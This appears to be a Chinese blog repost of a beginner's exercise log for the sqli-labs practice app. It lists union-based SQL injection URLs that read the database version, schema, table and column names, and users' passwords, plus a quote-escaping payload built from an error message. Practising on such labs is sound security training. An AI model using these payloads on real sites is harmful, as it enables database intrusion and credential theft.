码迷,mamicode.com
首页 > 数据库 > 详细

sql注入第一天,题目

时间:2018-04-19 01:48:27      阅读:353      评论:0      收藏:0      [点我收藏+]

标签:on()   127.0.0.1   union   报错   ati   sch   SQ   data   sele   

一、查询数据库的版本号

http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,2,version()

技术分享图片

 

二、查询数据库中所有的库名

http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,2,group_concat(SCHEMA_NAME) from information_schema.schemata

技术分享图片

 

三、查询当前库的所有表名

http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables  where  table_schema=database()

技术分享图片

 

 

 

 

四、查询当前库中某一个表的所有列

http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from  information_schema.columns where table_schema = database() and table_name = ‘users‘h

 技术分享图片

 

五、查询当前库中某一个表的所有值

http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from security.users

 

127.0.0.1/Less-2/?id=-2 union select 1,2,group_concat(username, ‘-‘,password) from users

 技术分享图片

 

 

六、根据报错信息,

例:http://10.1.2.5:10631/sqli/Less-1/?id=1

技术分享图片

 

 

有用信息为:‘‘1‘‘ LIMIT 0,1‘

 

1、最终代码

http://10.1.2.5:10631/sqli/Less-1/?id=1‘ union select 1,2,database() %23 ‘ LIMIT 0,1

其中id=1 1可写可不写

sql注入第一天,题目

标签:on()   127.0.0.1   union   报错   ati   sch   SQ   data   sele   

原文地址:https://www.cnblogs.com/sunshineyan/p/8878616.html
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!